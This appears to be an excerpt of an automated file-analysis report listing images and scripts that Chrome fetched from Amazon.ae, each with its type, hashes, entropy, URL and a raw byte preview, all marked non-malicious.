                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*...........".................................................................!1A.46Qqr..."3ast..#2....b...BS...$CR.............................................1..!QR............?...$.........e...x8...?5.....y........6......k7.8........-A6..v-M....X..x...k.J..nLVg..%...K.V;.6...g.(5#..Q..Z6.}..\F.bZ......|.q...=.1...K..&...............pQz.rU\.e6.6.w....i.....(1(vbXt3..\.:..<M.....#4f.eI....^.#(Z..........N:/.WAQ.V..... .a.1..4.7.m.q.i.?..Q.u..s.'...2Q#........7..;KaY..@w..=....F..'.......... ....V.P..`....>.0.f....;.s.)?m...j..B..B..B..B..B..B..B...z3.|.O....t.Y...F..V.Yj.F0.i..y.o.*..ED@..?......*.........)Q?..Z......{7..l,.M*].{...Q. t...r.C.',MX.1..'.L.l.FP:,k...Gj.aX.~..j..c..g.|..XF..-./]ZGCa,.U|X.....U...@@..A#=.N?GrEk.K58...f%O.SAWJ.$S09..A....b..Y.FB.........Y.... .. .. .. .. .k;.8.............?.5^B..j
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):43
                                                                                                                                                                                                                                                                      Entropy (8bit):2.7374910194847146
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:CUnl/7yltxlHh/:/+/
                                                                                                                                                                                                                                                                      MD5:07FFF40B5DD495ACA2AC4E1C3FBC60AA
                                                                                                                                                                                                                                                                      SHA1:E8AC224BA9EE97E87670ED6F3A2F0128B7AF9FE4
                                                                                                                                                                                                                                                                      SHA-256:A065920DF8CC4016D67C3A464BE90099C9D28FFE7C9E6EE3A18F257EFC58CBD7
                                                                                                                                                                                                                                                                      SHA-512:49B8DAF1F5BA868BC8C6B224C787A75025CA36513EF8633D1D8F34E48EE0B578F466FCC104A7BED553404DDC5F9FAFF3FEF5F894B31CD57F32245E550FAD656A
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://aax-eu.amazon.ae/x/px/RIvbt4KWdIib_MEoD1J-U6gAAAGRdjK04QMAAAIGAQBvbm9fdHhuX2JpZDIgICBvbm9fdHhuX2ltcDEgICA2QY_d/atf/%7B%22atf%22:true%7D
                                                                                                                                                                                                                                                                      Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 301x320, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):28273
                                                                                                                                                                                                                                                                      Entropy (8bit):7.983603601699173
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:MSRQVqGQyrc2p9ZY5QIRvVzgaTv0xfn0q1gwfM4:MStGJrc2jVIRTKn0c9P
                                                                                                                                                                                                                                                                      MD5:3285BC9307F0BBE43DB535CE44A530F7
                                                                                                                                                                                                                                                                      SHA1:6462E7A1C083E1F0CA18629068869A22FBA37B20
                                                                                                                                                                                                                                                                      SHA-256:687BE24094B64C531DEBA4E14931A74B38E2CD64256D26E4BCF87A14BBD17C0E
                                                                                                                                                                                                                                                                      SHA-512:484247DF759C4A28A3986EC89B9F14CF2D915E4B761D79AB684CDADD6B86DB5B13A58918B546158B2F62F59C0CAF1618ADA39B7E2E730C7C0CD56E3BBEDD1C3E
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/81fb2hn0hpL._AC_UL320_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......@.-.."..........5..................................................................i!$...#..d....)....#w.RV.R,p....A...b..Kj.r l.....[&....M.y..=w^}.m.A2=.$$..B..|..p.b........'.E....ed.x..>.l.W9.0(.c. ....._.=1.........hE..q..].........#..$.. .gzO..57p\0_;...\.-c.....#....f5]b%.....(..0&L.i$(...B.Ca.y...].oR..u".X.J.bLw"....HI".K.w.D.Y^I...4f..L.I>q....}qdw;..Z.#..M....9y...yG7.).."R.t......4...$$.$.2.R.:{..........*G..8....1...._......<..9......F.7-......#..&(..LB........H.....G.]KDZQ,z./.}$u.w.W3.p9.~.b...'...W..l%.9....B..{8.Zug.M...?O..6.G....W...$$...E....PB...M...#.&...x.va&.....K-.....=..W{..9.$`8.4q.s...?.@gmw..?..)..5...Y....$..G.3.1. x2@I|..[..{g.i.L;......).#:..s76.p.I..P..k.b.z.m......F.....<=..\AHT....+.KBI.$/;...f...L..H.2.i|.......p;.,..J\.)m2.....0t:....C4.,!v..iI....B
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 160x37, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):2426
                                                                                                                                                                                                                                                                      Entropy (8bit):7.90058933800866
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:48:DPjh8Q3AZoSGQ7JBpLT1PZoIH9AQoR4ar7H5x5SBmBP3iUw+eQv4kf:Drh8Q3ijJ7TdZE8u7H5HSBmBAi
                                                                                                                                                                                                                                                                      MD5:4DA87D8B3B8C632F9C126B6B6943240C
                                                                                                                                                                                                                                                                      SHA1:D6066931A445E2D2720F7FA918577DCAA3EA5650
                                                                                                                                                                                                                                                                      SHA-256:60F2C55BEB89B48DC450C5A07E72F18355876E98C0CABE2B2D4C429632F024BA
                                                                                                                                                                                                                                                                      SHA-512:E48F29ECE4CC83CBB1FD78C38F562D5AAD836D5EBADF131C927EB6CC94B4646EB0CA21C754B06B93A82C64BEDFBCAE29690A872C12D03DC942E021E0EF852B93
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:"https://m.media-amazon.com/images/S/al-eu-726f4d26-7fdb/7c0c795f-4611-4e55-9ae6-d19245573000._CR0,0,600,100_AC_QL95_SX160_SY600_FMwebp_.jpg"
                                                                                                                                                                                                                                                                      Preview:RIFFr...WEBPVP8 f....-...*..%.>...@..f.8...........~.~..}.@..6.W......L..?%.........O... >.=.?E..~n.r...........................C..?..._.?.....|..5...g.....'j_..z..Y.3.......\..f...#.....K9....".'z@.....?._8..?..P........?.O.>.&......_...o._...~.............[.r......V|.T6j......*..K{.n.......x..I.c.`....XL.&H.f<.....D..p ..F(.."~W"..G..M...g.>!..k....PY.........v9..........#....1>.@q..../.PjOh\...ja...Y9.#.]\.u.....W~.;...1.n.5....N.|..#....eF(....Z...j....6.v6^...@...;..zkCiG....M....bOQ. |..M3$6.F....J.......8x..w..*.....`...a.G.1.j...t(.....hh+.=./.I..[F.......X..06.....M......:..8.......M.T...r....H..<`.s.KR.F....:k.|....qB.r.q....\r.. .g{.y.d.WjAm$`e.c.hq./.a...q.:~m....j/.._.....! ...=.|_ ....iE..W)..5_-...+2.t....../>m3....O...8;.....n.!...hg.\e.O...m.....)ya......v..D4.y...._t&...t...Xk...^....K..V[...<.&.x...JA]........[ .r.. Z.w..}..Z.T...'....5...KuW....E.....@f.C.~.OSfN8S....y..x....K553N........e....O..Y.Lw...F...(....
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 320x313, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):21265
                                                                                                                                                                                                                                                                      Entropy (8bit):7.956725232427071
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:/kbCIUqsGlB5aQWod00xhcJRo9qXjRgopxl/+Gtg5LqReu0ZoJwgwuv4JK/PdAwy:/kbRhs03ldDh+7zR1pD/+J5F/Xcv4JKC
                                                                                                                                                                                                                                                                      MD5:67DB16399F9A3A773F07FB8934CC3581
                                                                                                                                                                                                                                                                      SHA1:84B9DA2F83C82E4BF873E74C6A818E662022F4BC
                                                                                                                                                                                                                                                                      SHA-256:E1A69FB271300D9FA59627A539712A2557168BC61C128CEAA25621FFE48F5BF3
                                                                                                                                                                                                                                                                      SHA-512:069744C070C60D46BDF4ACCA0D18CA473DBEF58238AD8FC0D6A87E33279E87619EDB4B0694F587527AA442EBE9B6FE265D56273A84F1381BA48B5ADCF344D2BB
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/71J-qkoOa1L._AC_UL320_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......9.@.."..........6....................................................................Z<+C[wS..{.zG.=.....t.1...c........]i.+.3....1.1..l......d.C...m{.K.^.}]...e.+@..l.........fO(...j..V....(.j.9y...1..@.]..M...v..D.Z.'.+O..@.....!..........i.[9.....Y..@..b.4..I.'.;.j...f...FV|.c$.|....|..{t.W.\j.....e.............P..........<...R....!s....5.......&.Z.[........'J$..v..I..t.bV...|...e.(J..A@p..L......|.v|v..4Y.k.5..$s..z..tTz.....\..i..7L.g..u..:.:o}-+...B#.......]+..xMK3.....%..%..@.......d.X.q..l.CO....j`$...C.Cipv..^...yK.Eu..Z.D.0...J...}...R..{.,;.4.S...8...@......O.Bk..C;d..).)..f..7%.V.;6v.....+.H.....9....,.Q...n...6..A.N.S....ms...c.x$.3...Dw\..L.8...S....,n.s... ..!....3..+._.?.u.....}.c.6:...s......8n.z..S...._l.G..z......Y..g..e:[.....Pq3.2. ..<.%2..R!..l..W.....ym..9...+cOw.q=.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 240x220, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):6012
                                                                                                                                                                                                                                                                      Entropy (8bit):7.84029459007988
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:TJWDkiHj9so9t973bZrvnVPfD+3FuBG6ZG55i2NYgbS3fk1zqtsTeevhnEfn:1WDkiHB1vVHD+3Fdi2NdT1zthnan
                                                                                                                                                                                                                                                                      MD5:09F51E9AAD063B1F8C4DEB7611AC8B71
                                                                                                                                                                                                                                                                      SHA1:DDE63F40278AB684763402D1F79844D751BC3B5C
                                                                                                                                                                                                                                                                      SHA-256:98DFBCD071BF8FBCD650B5C9455131B59BAC1DEE5CA92E8E551544C1154921D0
                                                                                                                                                                                                                                                                      SHA-512:DC461764C01851F90F473312F853D50A45E33A8AE3E6F222C5AD2C2B48F6426900103DF7989720030B6CCD60B757E69A2B009C26F74421EE954B5ABAFB1511CF
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........2...............................................................`.................c.KB...K.....T._6\x....... :.*....??.kS..~r..z.c......s>yfs....|.......er6*.0t....l...2r.l.a.....e.Y.x.....&4./...1.T9t.....H}...zX.....~..6..E.,..^......_.........w...w..z..e......B.U*..G..........h}*..[..s..M.M.S.{...o.....>m..z...<y.V].d..$.V.E.U....N.Y..]....t.AH.9...../..._&Kt.......Ew.l..E..>.e8Wp.[o../.w..6.S..I..>="k...(FR.L[........<.D.d....'V[2..3..../.kT...N<.+/ns.}.,.X*.p.k.z....YlD.W.._c~.bf...\/...*...[ma.c"...>.~=...P...7......k[(....;......3.J..}....V...Y....<{...a:...BP....b.G..M.........w.Mj.S....cC....@.......`..5..!L....`3@..............?...3..........................!..."0124.. #3@A$%`q5BC............%3`mJl.A.<...I.u.]u..h.*<..#>F.6.<.`kw.k.;.>$[S..{.n....d...^.C...W+.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 379x304, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):23454
                                                                                                                                                                                                                                                                      Entropy (8bit):7.960066050617329
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:362XylC7saGwgkGOYIChPIQWFzBUz2jj2KKEqGybtQNL5Vn8XN9HGUx4fjhsizyD:3slCYXwgJOY90jjhKEqGymL5+99TuhjQ
                                                                                                                                                                                                                                                                      MD5:D63CD26924F97276B0E35C239A8EF3AA
                                                                                                                                                                                                                                                                      SHA1:27CB6AE43751E84805B9F5840DF93BB19E099EDC
                                                                                                                                                                                                                                                                      SHA-256:C04CBBE569EA56DC1AB5BF5E0857A0ACFCE9A030E4DB5D4AF42CA4FDFF4C51C8
                                                                                                                                                                                                                                                                      SHA-512:22723EA8A6BFCA3842B8A89CC75BF644AAAEB66D7C4F6B9B7128AAF4F2B9A7B38E50E68EA5E15FEE5FD30DF3221F2049854D9CEA4997E51C5B48A7D8A0D0A0CE
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/electronic/kamja/Stores/BudgetStore/2404DR14_3__AE_GW_DC_ElectronicsBudget_379x304._SY304_CB554784697_.jpg
                                                                                                                                                                                                                                                                      Preview:......Exif..II*.................Ducky.......=......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c002 79.a6a63968a, 2024/03/06-11:52:05 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:FC03975124CB11EFA30E8F55AA993B0A" xmpMM:InstanceID="xmp.iid:FC03975024CB11EFA30E8F55AA993B0A" xmp:CreatorTool="Adobe Photoshop 2024 Windows"> <xmpMM:DerivedFrom stRef:instanceID="2AD725D48FD3018F515EAE113945F37E" stRef:documentID="2AD725D48FD3018F515EAE113945F37E"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...............................................................................................................................................
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, progressive, precision 8, 3000x1200, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):150465
                                                                                                                                                                                                                                                                      Entropy (8bit):7.743263701962922
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3072:43Ocg0nc9WBK7vtY9EDWVuQT4xL+BIRX1FBoZtgq/YuhhJrbV:ncg0nHWvC54xLBRlvQr/f/rZ
                                                                                                                                                                                                                                                                      MD5:88B3C2911073DF4DA51BC69DA8596761
                                                                                                                                                                                                                                                                      SHA1:ADC57BA68A6E056B0979FC5D7AF105491AEA2005
                                                                                                                                                                                                                                                                      SHA-256:E0EFD5DD02CEF246FC8CCA2574B2F6912473DAC99997A141E3FCA08D7BEA103C
                                                                                                                                                                                                                                                                      SHA-512:AF6BCE5549201FC203FD60D4066A4D774898A3F6D517D7D41E4C952D27866521BC68DDC3D3786D786A01C4AB653A3C69160C58EE1D2C0692AEE457ADC69936CB
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/71bwlcJOkvL._SX3000_.jpg
                                                                                                                                                                                                                                                                      Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 142x116, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):2517
                                                                                                                                                                                                                                                                      Entropy (8bit):7.783632518357717
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:48:TT0rbTvvvvvvvvvv8vE4UjfhTEBsWFkScpiSbitGiJSquaxEhk57B+mJdxBPvvvZ:Ton4UtgBPFkKCzquU/57B++dL5
                                                                                                                                                                                                                                                                      MD5:C3B3969B9841D37F783AEF5C0F576147
                                                                                                                                                                                                                                                                      SHA1:2E0EDCE41D718406AD5D0C1D28877DBD5F97BA56
                                                                                                                                                                                                                                                                      SHA-256:B6D1C1172E4990D92D315A8A4C20513C92FE7C14E385CB098A10E366A47A659A
                                                                                                                                                                                                                                                                      SHA-512:58D0186067E4E55F1234DCC0737431FE64F16B7592520A236117B300C67DF9C741AC473F7E109244B6893F9B68644918C1D9109E15A6FD0092D735D791E84206
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/electronics/store/kamja/WebQC/2021/Electronics/Feb_Cameras_1x._SY116_CB659040198_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."................................................................!"1.AQ.aq......#2Urs.56Bu....ERb..$%4CTd................................................."A..............?...)J.)J.)J.)J.)J.)J.)J.)J.)J.)J.)J.)J.)Xz..m.A%...1...p.....+8e.w..H....*..Z8..(........W...m.._.0[.V6....`J...j.s.....X..9\.P....gtn..8.7.?.;g%.8.....2R0.><.....)....r.<Ey.>.......L._."...%;... .`qV.#.Z.;.".k.kK.....>~......w......R..R..R...F......[Z...k..$]..1...O..7..\......[.MoW.O.."xma.p.|.pn.V....l.H.|L..L .......;.....5....C...fW.pj...~!.R.g..i......B0%..d..._m..""C....#@...\I.m....S.....r.t.....>[..H.+..p&.,.f.....h....F-<...f%..|....x5k.mI`.x.H.`.v.t..5.e.6...v....X.T..EQ....Pqc@....A."..g.8..Ml.]..T.ywk...`G..w4."<1$..hc*.{.7W.d.#.c.$Ub]N0[1[....=.'....}sf..&.{y.V.......2CA.Gx..?..`..b....wc{.9.2....;.v..um..(.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):43
                                                                                                                                                                                                                                                                      Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                      MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                      SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                      SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                      SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 142x116, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):2215
                                                                                                                                                                                                                                                                      Entropy (8bit):7.780080651712038
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:48:TT0r1bmS1J7o9AQuSJ4KkxZjG97evR+z22pbK3PzcGCSdbbbbR:TmDsCQXJUjG97E+FhK3Pz7bbbbR
                                                                                                                                                                                                                                                                      MD5:6A20D8C3C1C584CBDBFD7BF6376F07B2
                                                                                                                                                                                                                                                                      SHA1:09ED213ED35E8553E1279F920A6BC2878F9010F7
                                                                                                                                                                                                                                                                      SHA-256:30DA63A92210E0B20817E57EAF2789A5B4DC9895703298A0083E52799C1B7338
                                                                                                                                                                                                                                                                      SHA-512:F735DE0A33BE1DEAD940B2B7A9F734E018D7189325EDD586CFB05603A0B9EB6C4E3132375C3AE29087259A7B7735790D50529F73A23D2FB6C9DCAD14E5E3BF4C
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/electronics/store/kamja/WebQC/2021/Audio/Feb_Gaming_1x._SY116_CB659040113_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."................................................................!.1A..2Qa."qr..BR..#3T.....%S..............................................1.A............?............../...<..1..s......1.LEZ.{G{.c.{.....F..^.......E9y.....5..N...[8.._.H.i..M./....W....&TSJ.b..F8=...}...............5..<X.?...]c.SI.E.=.6.'...U.a.9(.C\k+...l....D.q...m8=.;.3'.4.`..=LL9..B!.JJ(.A-...J.e..w1.......Q*k.~..k3..ANG./Y|..^......U......u.#Id}CK.`..j.v...%.e-... .....G...8...z..i.T...D.`..2&.......'2W....R.n....C/.I.V....m.v#.R.:..#.a*.5...R<.|.bf....l.VK.a.,OC5.... ..z7t{}B.....W..Ps|..,g.Q.1.../N..T........DNn..G...I.1..l..h.....f..$?..wo_.v..T.""." ""." *}.G...{=..*h..}.Hr`W.k....Ub.\.|,..6.`..n...!...s.I.N.z...v._..a..0...{3{.>2*#.l8q6 .P..I..y.#...hh.h.4..........}.,..[i.F.i._.-..\E.{FE.....U2.I....v@....6<...
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (1922)
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):423055
                                                                                                                                                                                                                                                                      Entropy (8bit):5.746869127772581
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3072:uERrns7Gth0wXdoyl2O+zLwkGlp2Aql58L1SlKglC2xsng9aF:ugnsmh0wx2O+xGr2VlyL1SlKb28F
                                                                                                                                                                                                                                                                      MD5:FD271D08E98605649B63E1FD2A46A109
                                                                                                                                                                                                                                                                      SHA1:FDBC7E8BB168DE20047CCDA7646FF9F62F80A0C4
                                                                                                                                                                                                                                                                      SHA-256:4F3AE3BBC75BFF3EB7BD6444FFA91907B21A86ED41526193A0A88DD28644C694
                                                                                                                                                                                                                                                                      SHA-512:C5468D1D738E3424EFF00E773F7E570A26D5FD0855F4EDC248AA0F0F0DF6579C333520707892677F1653B2E7E443F0A483F0520768D21919E856F5B3B5B1937F
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://www.amazon.ae/service-worker.js
                                                                                                                                                                                                                                                                      Preview:(function(){self.getServiceWorkerGlobalClientConfigData=function(){try{return JSON.parse(decodeURIComponent("%7B%22deviceProperties%22:%7B%22appType%22:%22web%22,%22deviceType%22:%22desktop%22%7D,%22marketplaceProperties%22:%7B%22countryCode%22:%22ae%22,%22marketplaceName%22:%22Amazon.ae%22,%22obfuscatedMarketplaceId%22:%22A2VIGQ35RCS4UG%22%7D,%22namespaces%22:%7B%22in-latency%22:%7B%22lightsaber-web%22:%7B%22data%22:%7B%22clientEnabled%22:true%7D%7D,%22lightsaber-mshop%22:%7B%22data%22:%7B%22clientEnabled%22:false%7D%7D%7D,%22lightsaber-rule-levers%22:%7B%22bazaar-gateway-mshop-web%22:%7B%22data%22:%7B%22ruleEnabled%22:true%7D%7D,%22buyagain-mshop-android%22:%7B%22data%22:%7B%22ruleEnabled%22:true%7D%7D,%22cart-mobile-web%22:%7B%22data%22:%7B%22ruleEnabled%22:true%7D%7D,%22browsepage-mobile-web%22:%7B%22data%22:%7B%22ruleEnabled%22:true%7D%7D,%22search-mshop-android%22:%7B%22data%22:%7B%22ruleEnabled%22:true%7D%7D,%22detail-mobile-web%22:%7B%22data%22:%7B%22ruleEnabled%22:true%7D%7D,%
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):43
                                                                                                                                                                                                                                                                      Entropy (8bit):2.7374910194847146
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:CUnl/7yltxlHh/:/+/
                                                                                                                                                                                                                                                                      MD5:07FFF40B5DD495ACA2AC4E1C3FBC60AA
                                                                                                                                                                                                                                                                      SHA1:E8AC224BA9EE97E87670ED6F3A2F0128B7AF9FE4
                                                                                                                                                                                                                                                                      SHA-256:A065920DF8CC4016D67C3A464BE90099C9D28FFE7C9E6EE3A18F257EFC58CBD7
                                                                                                                                                                                                                                                                      SHA-512:49B8DAF1F5BA868BC8C6B224C787A75025CA36513EF8633D1D8F34E48EE0B578F466FCC104A7BED553404DDC5F9FAFF3FEF5F894B31CD57F32245E550FAD656A
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (898)
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):39792
                                                                                                                                                                                                                                                                      Entropy (8bit):5.597621075181012
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:etDgDhJAefdtymFX6YGiqIysS56Br7xAvnRtLxyJUCN7D:etDgDhGety556BHMiUCN7D
                                                                                                                                                                                                                                                                      MD5:8FF500461A54D906EB4174A1D68572CA
                                                                                                                                                                                                                                                                      SHA1:F9F3356280777BDC2EFFBB3150439E753A8B9A47
                                                                                                                                                                                                                                                                      SHA-256:744C68C533D805B776FB38633DF88781214326B521F41844431163BE8302B0E8
                                                                                                                                                                                                                                                                      SHA-512:56933F50F2039852B43FB1717C3DAEEF83B99FB831C8B84225CF5B46054F422C75286F2D232E38D92BDCE23E45F1A313979F1101150E2B9D39C17A4E74CD7F16
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/I/51gsh6m8dDL.js?xcp
                                                                                                                                                                                                                                                                      Preview:'use strict';mix_d("OctopusSearchResultCards__octopus-search-result-card:octopus-search-result-card__2IM4e7yC","require exports tslib @c/logger @c/scoped-dom @c/metrics @c/dom @c/remote-operations @p/A @c/browser-operations".split(" "),function(Ha,K,q,ib,jb,kb,P,lb,mb,nb){function W(a){return a&&"object"===typeof a&&"default"in a?a:{"default":a}}function Ia(a){if(a&&a.__esModule)return a;var b=Object.create(null);a&&Object.keys(a).forEach(function(c){if("default"!==c){var d=Object.getOwnPropertyDescriptor(a,.c);Object.defineProperty(b,c,d.get?d:{enumerable:!0,get:function(){return a[c]}})}});b["default"]=a;return b}function Ja(a,b){n["default"].cardRoot.querySelector(a).addEventListener("click",function(){X(b)})}function ob(){var a=n["default"].cardRoot.querySelector("#apb-browse-search-filter");a&&a.addEventListener("click",function(){X("filter-button")})}function ma(a,b,c){(a=n["default"].cardRoot.querySelector(a))&&a.addEventListener("click",function(d){d=d.target;d.classList.contai
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                      Category:downloaded
